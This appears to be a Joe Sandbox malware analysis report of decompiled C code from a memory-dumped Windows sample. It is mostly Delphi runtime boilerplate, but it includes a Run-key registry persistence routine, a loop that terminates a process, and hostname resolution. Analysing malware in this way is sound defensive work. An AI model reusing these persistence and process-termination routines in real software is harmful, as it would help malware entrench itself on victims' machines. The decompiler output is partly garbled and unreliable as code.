    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
